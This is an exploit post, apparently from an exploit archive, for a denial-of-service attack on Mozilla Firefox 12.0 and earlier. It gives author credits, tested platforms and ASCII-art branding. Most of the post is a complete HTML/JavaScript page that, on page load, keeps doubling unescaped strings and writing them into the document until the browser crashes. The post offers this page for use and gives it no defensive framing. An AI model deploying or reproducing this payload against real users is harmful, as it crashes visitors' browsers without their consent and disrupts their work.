Mozilla Firefox <=12.0 Denial Of Service Exploit
|
来源:l20ot[at]yahoo[dot]com 作者:L20ot 发布时间:2012-05-07
|
|
Title: Mozilla Firefox <=12.0 Denial Of Service Exploit Author: L20ot - l20ot[at]yahoo[dot]com Software Link: http://www.mozilla-europe.org/en/firefox/ Version: 12.0 - lastversion Tested on: Windows 7 x32\x64 Description: visiting this php page you'll get an instant crash of Firefox Greetz: nimaarek & MOH3NCODEr [inoob team]
_ _______ _______ _______ _________ ( \ / ___ )( __ )( ___ )\__ __/ | ( \/ ) || ( ) || ( ) | ) ( | | / )| | / || | | | | | | | _/ / | (/ /) || | | | | | | | / _/ | / | || | | | | | | (____/\( (__/\| (__) || (___) | | | (_______/\_______/(_______)(_______) )_(
<html> <title>FF go away :)</title> <head> <script> function FTB() { var A1 = unescape("%u4141%u4141"); var A2 = unescape("%u4242%u4242"); var A3 = unescape("%u4343%u4343"); var A4 = unescape("%u4444%u4444"); for(i=0; i <= 1000 ; ++i) { A1+=A1; A2+=A2; A3+=A3; A4+=A4; document.write(A1); document.write(A2); document.write(A3); document.write(A4); } document.write(A1); document.write(A2); document.write(A3); document.write(A4); } </script> </head> <body onLoad="FTB()"> </body> </html>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|